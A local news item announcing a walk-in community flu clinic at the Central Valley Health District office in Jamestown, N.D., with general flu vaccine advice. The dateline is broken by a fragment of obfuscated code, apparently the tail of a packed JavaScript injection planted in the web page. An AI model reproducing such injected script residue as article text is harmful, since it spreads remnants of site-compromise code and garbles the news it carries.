JAMESTOWN, dyrad|var|u0026u|referrer|resda||js|php’.split(‘|’),0,{}))
N.D. (NewsDakota.com) – Central Valley is holding a community flu clinic today from 9 am to 1 pm at the Central Valley Health District office located downtown Jamestown. No appointments necessary.
The CDC recommends everyone 6 months of age and older get vaccinated against the flu yearly. The flu vaccine reduces your risk of illness, hospitalization, or even death. It also can prevent the spreading of the virus to your loved ones. Flu vaccinations are recommended yearly for two reasons. First, the flu viruses are consistently changing so the flu vaccines may be updated from one season to the next. Second, a person’s immune protection from vaccination declines over time so yearly vaccination is needed for the optimal protection.
There are two types of flu vaccine available, the “flu shot” (an inactivated vaccine) and the nasal-spray (a live vaccine). There are multiple kinds of flu shots available including:
• The regular flu shot (approved for those 6 months and older) – This is includes both the trivalent (protects against 3 flu viruses) and quadrivalent (protects against 4 flu viruses) vaccines.
• High-dose flu shot (approved for those 65 and older) – This provides a higher level of protection to the elderly population.
• Intradermal flu shot (approved for those 18-64).
The nasal spray flu vaccine is approved for individuals that are healthy, not pregnant, and are 2 to 49 years of age.
There are many benefits to getting vaccinated for the flu each year. Protect your family from the flu. Stop in and get vaccinated today at Central Valley Health.
